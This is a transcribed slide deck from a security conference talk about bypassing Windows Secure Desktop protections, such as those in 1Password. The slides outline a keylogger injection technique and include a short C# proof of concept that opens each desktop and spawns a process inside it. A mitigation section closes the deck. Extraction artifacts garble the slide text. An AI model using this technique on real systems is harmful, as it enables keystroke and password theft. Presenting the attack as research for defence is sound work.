Video Converter
Audio Converter
Image Converter
PDF Converter
File Compressor
agenda

Agenda Who Are We? Intro To Secure Desktop What is it? What - PowerPoint PPT Presentation

Dec 20, 2022 •356 likes •603 views

Bypassing Secure Desktops Protections Bruno Oliveira & Mrcio Almeida Agenda Who Are We? Intro To Secure Desktop What is it? What does it work? Windows API Our PoC Mitigation Conclusions Who are we?

  1. Bypassing Secure Desktops Protections Bruno Oliveira & Márcio Almeida ¡ ¡

  2. Agenda ① Who Are We? ② Intro To Secure Desktop – What is it? – What does it work? ③ Windows API ④ Our PoC ⑤ Mitigation ⑥ Conclusions

  3. Who are we? Don’t know you • Bruno Gonçalves de Oliveira – Senior SpiderLabs Security Consultant – MSc Candidate – Offensive Security – Talks at AppSec USA 14, THOTCON, SOURCE Boston, Black Hat DC, SOURCE Barcelona, DEF CON, Hack In The Box, ToorCon, Ekoparty, YSTS & H2HC. • Márcio Almeida Macêdo – SpiderLabs Security Consultant – MSc Degree focusing in Web Applications Security – UFPE – Talks at Alligator Security Conference 2012 and 2013, YSTS, Ekoparty and Black Hat.

  4. Secure Desktop

  5. Secure Desktop What is it? • A way to protect against keystrokes sniffers. • A new desktop created from the *original* one that should isolate the application. • Only accessed with SYSTEM privileges.

  6. Secure Desktop How does it work? • It is utilized the functions from Desktop objects (Windows API) to create the new desktop. • It is only accessed with SYSTEM privileges.

  7. Demo 1 How SD works?

  8. Demo 2 Injecting payload on process

  9. Demo 3 Courtesy Shell – VNC Payload

  10. Windows API

  11. Desktop Functions (user32.dll) MSDN • CloseDesktop • CreateDesktop • EnumDesktops • GetThreadDesktop • OpenDesktop • OpenInputDesktop • SetThreadDesktop • SwitchDesktop h#p://msdn.microso0.com/en-­‑us/library/windows/desktop/ms687107(v=vs.85).aspx ¡

  12. Sessions, Windows Stations and Desktops Windows API Session ¡0 ¡ Windows ¡StaHon ¡ Desktop ¡ Another ¡ ApplicaHon ¡ ApplicaHon ¡

  13. What the Applications do? Windows API Session ¡0 ¡ Windows ¡StaHon ¡ Desktop ¡ Secure ¡Desktop ¡ Another ¡ … ¡ ApplicaHon ¡ ApplicaHon ¡ User ¡Input ¡

  14. Our Attack Windows API Session ¡0 ¡ Windows ¡StaHon ¡ Desktop ¡ Secure ¡Desktop ¡ Another ¡ KeyLogger ¡ … ¡ Windows ¡API ¡ ApplicaHon ¡ Process ¡ ApplicaHon ¡ User ¡Input ¡

  15. Attack Details Proof-Of-Concept • Utilizing OpenDesktop (user32.dll) function request the desktop to be opened. • Utilizing SetThreadDesktop (user32.dll) get access to desktop. • Utilizing CreateProcess (kernel32.dll) Start a KeyLogger process into this desktop. • Get the user input via the KeyLogger process into the “Secured Desktop”.

  16. Proof-Of-Concept Source Code 1. ¡staHc ¡void ¡Main(string[] ¡args) ¡{ ¡ 2. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡IntPtr ¡hNewDesktop; ¡ 3. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡while ¡(true) ¡ 4. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡{ ¡ 5. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡foreach ¡(string ¡desktop ¡in ¡GetDesktops()) ¡ 6. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡{ ¡ 7. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡if ¡(!hasP0wn3d(desktop)) ¡ 8. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡{ ¡ 9. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ 10. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡hNewDesktop ¡= ¡Open(desktop); ¡ 11. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡Task.Factory.StartNew(() ¡=> ¡ 12. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡{ ¡ 13. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡SetThreadDesktop(hNewDesktop); ¡ 14. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡CreateProcess("c:\\windows\\system32\\cmd.exe", ¡desktop); ¡ 15. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡}).Wait(); ¡ 16. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡_p0wn3d_desktops.Add(desktop); ¡ 17. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡} ¡ 18. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡} ¡ 19. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡} ¡ 20. ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡} ¡

  17. DEMO 4 Proof of Concept

  18. Mitigation

  19. Session Isolation Windows API Session ¡0 ¡ Session ¡1 ¡ Windows ¡StaHon ¡ Windows ¡StaHon ¡ Desktop ¡ Desktop ¡ Another ¡ Processes ¡ ApplicaHon ¡ ApplicaHon ¡ User ¡Input ¡

  20. Solution Adopted by 1Password (CVE-2014-3753)

  21. Solution Adopted by 1Password CVE-2014-3753 Detect ¡if ¡the ¡1Password ¡is ¡the ¡unique ¡process/program ¡running ¡ ¡ into ¡the ¡Secure ¡Desktop ¡and ¡if ¡isn’t ¡close ¡the ¡desktop ¡and ¡alert ¡ ¡ the ¡user. ¡

  22. Conclusions

  23. THANK YOU ¡ ¡

Recommend

Unicode Agenda for Bangla Unicode Agenda for Bangla Unicode Agenda for Bangla Unicode Agenda for

Unicode Agenda for Bangla Unicode Agenda for Bangla Unicode Agenda for Bangla Unicode Agenda for

Unicode Agenda for Bangla Unicode Agenda for Bangla Unicode Agenda for Bangla Unicode Agenda for Bangla Bidyut Baran Chaudhuri Bidyut Baran Chaudhuri Society for Natural Language Technology Research Society for Natural Language Technology

275 views • 24 slides
Negotiating Conflicts Eff Effectively ti l Agenda Agenda Agenda Agenda Introductions

Negotiating Conflicts Eff Effectively ti l Agenda Agenda Agenda Agenda Introductions

Negotiating Conflicts Eff Effectively ti l Agenda Agenda Agenda Agenda Introductions Introductions 1) Negotiation Characteristics 2) Approaches to Conflict 2) Approaches to Conflict 3) Issues, Positions, and Interests 4)

1.06k views • 60 slides
Katie Dively, Research Scientist II Agenda Agenda Agenda Agenda Welcome! 7 Step

Katie Dively, Research Scientist II Agenda Agenda Agenda Agenda Welcome! 7 Step

Katie Dively, Research Scientist II Agenda Agenda Agenda Agenda Welcome! 7 Step Communication Process Your Role Next Steps Centers Purpose Centers Purpose Centers Purpose Centers Purpose We are an

751 views • 55 slides
THE BLACK ART OF BINARY HIJACKING HIJACKING Agenda Agenda Agenda Agenda 2 2 Overview of

THE BLACK ART OF BINARY HIJACKING HIJACKING Agenda Agenda Agenda Agenda 2 2 Overview of

Principal Consultant Nick Harbour nick.harbour@mandiant.com ick.harbour@mandiant.com @ THE BLACK ART OF BINARY HIJACKING HIJACKING Agenda Agenda Agenda Agenda 2 2 Overview of Persistence Techniques Overview of Persistence

155 views • 14 slides
Community Advisory Group Meeting June 20, 2016 Agenda 1. Welcome, Introductions and Agenda

Community Advisory Group Meeting June 20, 2016 Agenda 1. Welcome, Introductions and Agenda

Community Advisory Group Meeting June 20, 2016 Agenda 1. Welcome, Introductions and Agenda Overview 2. Public Comment (items not on the agenda) 3. CAG Questions and Concerns (items not on the agenda) 4. Labor Issue Update 5. New Generation

1.22k views • 55 slides
Anaheim August 27, 2008 Agenda Agenda Agenda Introduction New Rule Requirements

Anaheim August 27, 2008 Agenda Agenda Agenda Introduction New Rule Requirements

Anaheim August 27, 2008 Agenda Agenda Agenda Introduction New Rule Requirements Compliance Plan Upgrade Issues Questions Introduction Introduction Introduction Danny Luong Senior Enforcement Manager Background

989 views • 29 slides
Investor Report 2019 Earning Result 2 nd March 2020 AGENDA ITEM 01 FY2019 Performance AGENDA

Investor Report 2019 Earning Result 2 nd March 2020 AGENDA ITEM 01 FY2019 Performance AGENDA

Investor Report 2019 Earning Result 2 nd March 2020 AGENDA ITEM 01 FY2019 Performance AGENDA ITEM 02 Strategy & Growth AGENDA ITEM 03 Appendix 2 01 AGENDA ITEM 01 FY2019 Performance 3 01 FY2019 Results Active Outlet/Customer

225 views • 18 slides
Capital markets day 27 th September 2017 Agenda Time Agenda item Led by Time Agenda item

Capital markets day 27 th September 2017 Agenda Time Agenda item Led by Time Agenda item

Capital markets day 27 th September 2017 Agenda Time Agenda item Led by Time Agenda item Led by 14:15 TEA & COFFEE BREAK 11.00 Introduction Carolyn McCall 11.05 1. Market / Network 14.30 4. Making travel easy & affordable

1.22k views • 90 slides
March 17, 2010 PURPOSE and AGENDA PURPOSE and AGENDA This meeting is a part of the NEPA/CEPA

March 17, 2010 PURPOSE and AGENDA PURPOSE and AGENDA This meeting is a part of the NEPA/CEPA

March 17, 2010 PURPOSE and AGENDA PURPOSE and AGENDA This meeting is a part of the NEPA/CEPA Process. Agenda Agenda Introductions Update on the Danbury Branch CTC Project Update on Danbury Branch EIS Project Discussion

841 views • 55 slides
MOBILITY RESULTS PRESENTATION FOR THE YEAR ENDED 30 JUNE 2014 AGENDA AGENDA FINANCIAL

MOBILITY RESULTS PRESENTATION FOR THE YEAR ENDED 30 JUNE 2014 AGENDA AGENDA FINANCIAL

LEADERS IN MOBILITY RESULTS PRESENTATION FOR THE YEAR ENDED 30 JUNE 2014 AGENDA AGENDA FINANCIAL OPERATIONAL REVIEW & HIGHLIGHTS CONTEXT STRATEGY OUTLOOK REVIEW ACQUISITIONS 2 AGENDA AGENDA FINANCIAL OPERATIONAL REVIEW &

818 views • 65 slides
R E B I R T H R E B I R T H 1 Meeting Agenda Meeting Agenda Agenda 1

R E B I R T H R E B I R T H 1 Meeting Agenda Meeting Agenda Agenda 1

Annual General Meeting of Shareholders No. 1/2015 28 January 2015 At 1.30 P.M. at Athenee Crystal Hall, 3rd Floor, Plaza Athenee Bangkok R E B I R T H R E B I R T H 1 Meeting Agenda Meeting Agenda Agenda 1 To certify

884 views • 54 slides
Todays Agenda Todays Agenda Continued Todays Agenda Continued Save the Date August

Todays Agenda Todays Agenda Continued Todays Agenda Continued Save the Date August

Todays Agenda Todays Agenda Continued Todays Agenda Continued Save the Date August 17 & 18, 2021 10th Annual Nation to Nation Consultation Host: Chickasaw Nation USDA Leadership & Tribal Leaders Oklahoma NRCS

892 views • 65 slides
Web E Web E ngineer ngineer ing Pr ing Pr oc ess oc ess We e k 2 Agenda (Lecture) Agenda

Web E Web E ngineer ngineer ing Pr ing Pr oc ess oc ess We e k 2 Agenda (Lecture) Agenda

Web E Web E ngineer ngineer ing Pr ing Pr oc ess oc ess We e k 2 Agenda (Lecture) Agenda (Lecture) Web Engineering Process W b E i i P Agenda (Lab) Agenda (Lab) Web 2.0 architecture patterns Project proposal P j t l

1.06k views • 19 slides
F F unctional Design unctional Design We e k 9 Agenda (Lecture) Agenda (Lecture)

F F unctional Design unctional Design We e k 9 Agenda (Lecture) Agenda (Lecture)

F F unctional Design unctional Design We e k 9 Agenda (Lecture) Agenda (Lecture) Functional design F ti l d i Agenda (Lab) Agenda (Lab) Weekly progress report Homework/Lab assignments Announcement Announcement Walk

478 views • 24 slides
IDN BOF Agenda Harald Alvestrand, chair Agenda - 1 0900: Agenda bash, blue sheet, scribe ! 0910:

IDN BOF Agenda Harald Alvestrand, chair Agenda - 1 0900: Agenda bash, blue sheet, scribe ! 0910:

IDN BOF Agenda Harald Alvestrand, chair Agenda - 1 0900: Agenda bash, blue sheet, scribe ! 0910: Introduction to the IDN revision - John Klensin - An orientation on the main goals of the revision - Explanation of the division of labor between

235 views • 10 slides
Agenda Agenda Linda Rammler, UConn UCEDD (copy from Agenda handout) Fr. John Gallagher,

Agenda Agenda Linda Rammler, UConn UCEDD (copy from Agenda handout) Fr. John Gallagher,

2/21/18 Agenda Agenda Linda Rammler, UConn UCEDD (copy from Agenda handout) Fr. John Gallagher, O.F.M. Cap. (St. Pius X Church) Kim Ranell Newgass (Baptist Church in New Haven) Mary Lou Freitas (Bethany Covenant) Doris

511 views • 5 slides
Innovation is as much about creativity innovation as it is about transfer of scientific

Innovation is as much about creativity innovation as it is about transfer of scientific

ST ARTS Innovation at the nexus of S cience, T echnology, and the ARTS A perspective on innovation at the confluence of knowledge and creativity How crossovers with the Arts can make European industry more competitive Ralph Dum DG

584 views • 12 slides
Experiences typesetting mathematical physics Dr. Ulrik Vieth Stuttgart, Germany EuroT EX 2009

Experiences typesetting mathematical physics Dr. Ulrik Vieth Stuttgart, Germany EuroT EX 2009

Overview of the project Setting up T EX for physics Improving mathematical formulas Experiences typesetting mathematical physics Dr. Ulrik Vieth Stuttgart, Germany EuroT EX 2009 Overview of the project Setting up T EX for physics

503 views • 29 slides
Dual Deploy Recovery Why do dual deploy? What you need Mandatory

Dual Deploy Recovery Why do dual deploy? What you need Mandatory

Dual Deploy Recovery Why do dual deploy? What you need Mandatory Optional/Configuration-dependent Altimeter Redundant systems Wiring Charge wells Battery and holder Shear pins Switch Parachute management

602 views • 37 slides
DESCENDER + 1 2 climb. work. rescue. 1 RP88X series: Issue A - Oct 2015 1 + 2 Activites

DESCENDER + 1 2 climb. work. rescue. 1 RP88X series: Issue A - Oct 2015 1 + 2 Activites

RP880 / RP885 Work/Rescue Descender DESCENDER + 1 2 climb. work. rescue. 1 RP88X series: Issue A - Oct 2015 1 + 2 Activites at height are inherently dangerous. Understand anc accept the risk involved before participating. You are

773 views • 29 slides
IS THE LINUX DESKTOP LESS SECURE THAN WINDOWS 10? OR HOW SUPER MARIO MUSIC CAN OWN YOUR SYSTEM.

IS THE LINUX DESKTOP LESS SECURE THAN WINDOWS 10? OR HOW SUPER MARIO MUSIC CAN OWN YOUR SYSTEM.

IS THE LINUX DESKTOP LESS SECURE THAN WINDOWS 10? OR HOW SUPER MARIO MUSIC CAN OWN YOUR SYSTEM. Hanno Bck https://hboeck.de 1 This was too easy . It should not be possible to find a serious memory corruption vulnerability in the default

584 views • 31 slides
Desktop Capture 164.pdf Page 1 of 35 Made with Doceri Desktop Capture 164.pdf Page 2 of 35

Desktop Capture 164.pdf Page 1 of 35 Made with Doceri Desktop Capture 164.pdf Page 2 of 35

Desktop Capture 164.pdf Page 1 of 35 Made with Doceri Desktop Capture 164.pdf Page 2 of 35 Made with Doceri Desktop Capture 164.pdf Page 3 of 35 Made with Doceri Desktop Capture 164.pdf Page 4 of 35 Made with Doceri Desktop Capture

476 views • 35 slides
Protocols for Application and Desktop Sharing draft-lennox-avt-app-sharing-00 IETF AVT Working

Protocols for Application and Desktop Sharing draft-lennox-avt-app-sharing-00 IETF AVT Working

Protocols for Application and Desktop Sharing Audio/Video Transport Protocols for Application and Desktop Sharing draft-lennox-avt-app-sharing-00 IETF AVT Working Group Wednesday, March 9, 2005 Jonathan Lennox/Henning Schulzrinne/Jason

279 views • 17 slides
An intro to Arduino microcontrollers!

An intro to Arduino microcontrollers!

An intro to Arduino microcontrollers!

990 views • 12 slides

More recommend

Explore More Topics

Stay informed with curated content and fresh updates.

animals pets art culture automotive transportation business finance computer internet construction architecture education-career electronics communication

Logo Sambuz

Unleash a World of Digital Possibilities—Browse, Share, and Explore Content Without Boundaries

Useful Links

About Us Privacy Services FAQ's Contact

Newsletter

Stay Informed & Inspired—Subscribe for the Latest Updates, Tips, and Exclusive Content Directly to Your Inbox.

Mail Us

mail@sambuz.com

2026 SAMBUZ, All right reserved.